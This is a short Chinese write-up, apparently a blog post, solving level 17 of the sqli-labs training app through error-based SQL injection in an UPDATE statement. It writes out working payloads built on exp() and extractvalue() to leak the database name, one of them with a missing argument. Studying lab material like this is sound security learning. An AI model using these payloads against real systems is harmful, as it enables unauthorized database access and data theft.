sqllab第十七关通关笔记

知识点:

  • 错误注入
  • update更新语句
    • update 表名 set 字段='输入' where 字段名=数据

通过admin admin进行输入发现是一个数据更新的语句

推测原始语句为update 表 set password='' where username=''

直接构造payload:passwd=admin'+and+exp(710)'

发现有错误提示,说明单引号起作用了,按理说引号已经闭合了,为啥还有错误呢

看提示应该是程序把'where username='识别成字符串了

修改payload:passwd=admin'+and+exp(710)='1

成功触发了exp()函数的错误提示;说明这里可以进行错误注入

接下来利用错误注入获取数据库的名字

构造payload:passwd=admin'+and+extractvalue(1,concat(0x7e,,0x7e))='1

成功获取到了数据库名;好了,收工了

10

相关推荐
Yang_jie_032 小时前
笔记:数据结构(栈是否使用底指针以及头指针的初始化值)
数据结构·笔记·算法
一杯奶茶¥3 小时前
c语言程序设计大学期末考试考研知识点重点笔记题库复习资料C语言重点考点题库资料合集
c语言·笔记·考研·c语言程序设计·c语言笔记
FakeOccupational4 小时前
【电路笔记 信号】传输线方程:从RLGC推导传输线特性阻抗
笔记
r_oo_ki_e_6 小时前
Java反射机制学习笔记
java·笔记·学习
Nontee6 小时前
数据类型与包装类 — 一个新手学Java的数据类型笔记
java·笔记·python
ysa0510306 小时前
【板子】树上启发式合并
数据结构·c++·笔记·算法
hengcaib6 小时前
金税四期下盐城企业财税合规技术路径:代理记账选型的技术思维
笔记
依然范特东7 小时前
深度学习入门学习笔记--感知机、神经网络
笔记·深度学习·学习
a1117768 小时前
SLAM 学习笔记(四)后端(KF BA)
笔记·学习
XGeFei8 小时前
【Django学习笔记】—— Django 高并发通俗讲解
笔记·学习·django